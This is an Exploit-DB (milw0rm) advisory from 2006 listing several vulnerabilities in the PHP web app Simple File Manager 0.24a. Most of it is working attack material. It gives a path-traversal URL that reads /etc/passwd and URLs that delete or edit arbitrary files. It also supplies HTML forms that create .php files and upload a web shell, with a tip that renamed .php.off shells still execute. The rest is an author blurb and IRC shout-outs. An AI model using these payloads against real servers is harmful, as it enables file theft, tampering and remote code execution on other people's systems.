simple file manager 0.24a - Multiple Vulnerabilities

EDB-ID:

2883


Author:

flame

Type:

webapps


Platform:

PHP

Date:

2006-12-02


/*******************************************\
| flame vrs Simple File Manager <=0.24=>    |
| http://onedotoh.sourceforge.net/          |
| Various Vulnerbilities Including:         |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files                |
| Deletion of Arbitrary files               |
| Modification of Arbitrary files           |
| Creation of Arbitrary files               |
| Uploading of Malicious files              |
\+++++++++++++++++++++++++++++++++++++++++++/


/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based  |
| file management utility.                  |
| It is designed to be used by those that   |
| don't want to use ftp or SHOULD NOT use   |
| ftp. It can be dropped into a specific    |
| directory and give access to that         |
| directory as well as any directory below  |
| it, including those created by SFM. It    |
| can be placed in a specific directory and |
| configured to give access to other        |
| directories outside of its location       |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as     |
| well as directory navigation (within its  |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text    |
| viewer and mime type downloading.         |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
 | Thats the description from the author...|
 | Which basically outlines all of its     |
 | vulnerbilities.                         |
 \_________________________________________/

/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2                                #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################ .:Deletion of Arbirary Files:. ###############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext=                                                   #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext=                                    #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext=                                                              #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext=                                                #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE:                                                                                                  #
 <form name="form1" method="post" action="http://www.site.com/file/fm.php">
 <center>Filename: <input type="text" name="newfilename">
 <select class=altButton name="newfileext">
 <option>.txt</option><option>.html</option><option>.php</option>
 </select>
 <textarea name="newcontent" cols="60" rows="15">&lt;/textarea&gt;
 <input type="hidden" name="copt" value="1">
 <input type="submit" name="savenew" value="Save">
 <input type="hidden" name="u" value="">
 <input type="hidden" name="pathext" value="/">
 <input type="hidden" name=sortKey value="2">
 </center>
 </form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off                   #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files)              #
###########################################################################################################################
\=========================================================================================================================/

/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE:                                                                                                  #
<form name="form1" method="post" action="http://www.site.com/file/fm.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="104857600">
<input type="hidden" name="copt" value="1">
<input type="file" name="uploadedfile">
<input type="submit" name="upload" value="Upload">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</form>
# END LOCAL HTML FILE                                                                                                     #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off                                                           #
###########################################################################################################################
\=========================================================================================================================/

                                       /++++++++++++++++++++++++++++\
                                       | Be good, and dont be too   |
                                       | hopeful about finding      |
                                       | yourself a gibbon running  |
                                       | this script. It predates   |
                                       | my #999999 hair.           |
                                       \++++++++++++++++++++++++++++/

      /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
      |---------------------------------------|
      | <&bk> stfu flame                      |
      | <~PhaZe_One> no fame without flame    |
      | <+c|p> I love you flame               |
      | <%emc2> flame wishes death upon you   |
      | <Thaimaishu> are you emo flame?       |
      | <&[myg0t]40> flame dont be mad        |
      | *~str0ke humps flame's leg            |
      | <&ZoNe_VoRTeX> <3 flame               |
      |---------------------------------------|
      \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/

# milw0rm.com [2006-12-02]